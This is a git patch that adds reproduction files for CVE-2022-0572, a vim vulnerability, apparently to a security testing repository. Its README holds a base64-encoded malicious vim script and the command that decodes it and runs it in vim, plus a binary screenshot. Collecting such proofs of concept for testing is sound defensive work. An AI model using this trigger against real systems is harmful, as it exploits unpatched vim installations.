From b8aec04a9bf872249e7bcaecadac14d383fdec59 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=96=87=E6=9D=B0?= <liwenjie@kylinos.cn>
Date: Fri, 21 Oct 2022 16:09:00 +0800
Subject: [PATCH] add CVE-2022-0572

---
 cve/vim/2022/CVE-2022-0572/README.md          |   9 ++++++++
 .../2022/CVE-2022-0572/png/CVE-2022-0572.png  | Bin 0 -> 22759 bytes
 cve/vim/2022/CVE-2022-0572/poc                |  12 +++++++++++
 cve/vim/2022/yaml/CVE-2022-0572.yaml          |  20 ++++++++++++++++++
 vulnerability_list.yaml                       |   1 +
 5 files changed, 42 insertions(+)
 create mode 100644 cve/vim/2022/CVE-2022-0572/README.md
 create mode 100644 cve/vim/2022/CVE-2022-0572/png/CVE-2022-0572.png
 create mode 100644 cve/vim/2022/CVE-2022-0572/poc
 create mode 100644 cve/vim/2022/yaml/CVE-2022-0572.yaml

diff --git a/cve/vim/2022/CVE-2022-0572/README.md b/cve/vim/2022/CVE-2022-0572/README.md
new file mode 100644
index 00000000..bc9ba1f5
--- /dev/null
+++ b/cve/vim/2022/CVE-2022-0572/README.md
@@ -0,0 +1,9 @@
+### 漏洞复现
+```shell
+$ echo -ne "ZnUgUihiLG4pCmxldCBvbGRfdGFic3RvcD0mdGFic3RvcApleGUicmV0ImE6bgppZiBhOm4KZXhl
+J3NlIHRhYnN0b3A9Jy5vbGRfdGFic3RvcAplbApjYWwgbCgiIixSKCcnLDQpCmNhbCBsKCIiLFIo
+JycsJycpCmVuZGYKY2FsIHNldGxpbmUoMSwiXHQwXHQiKQpzZSB0YWJzdG9wPTUwCmNhbF8oIiIs
+UignJywwKQo=" | base64 -d > poc
+$ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ":qa!"
+```
+![](./png/CVE-2022-0572.png)
\ No newline at end of file
diff --git a/cve/vim/2022/CVE-2022-0572/png/CVE-2022-0572.png b/cve/vim/2022/CVE-2022-0572/png/CVE-2022-0572.png
new file mode 100644
index 0000000000000000000000000000000000000000..45317fde5780e8f6038f3fc9ce00b89f85083da8
GIT binary patch
literal 22759
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
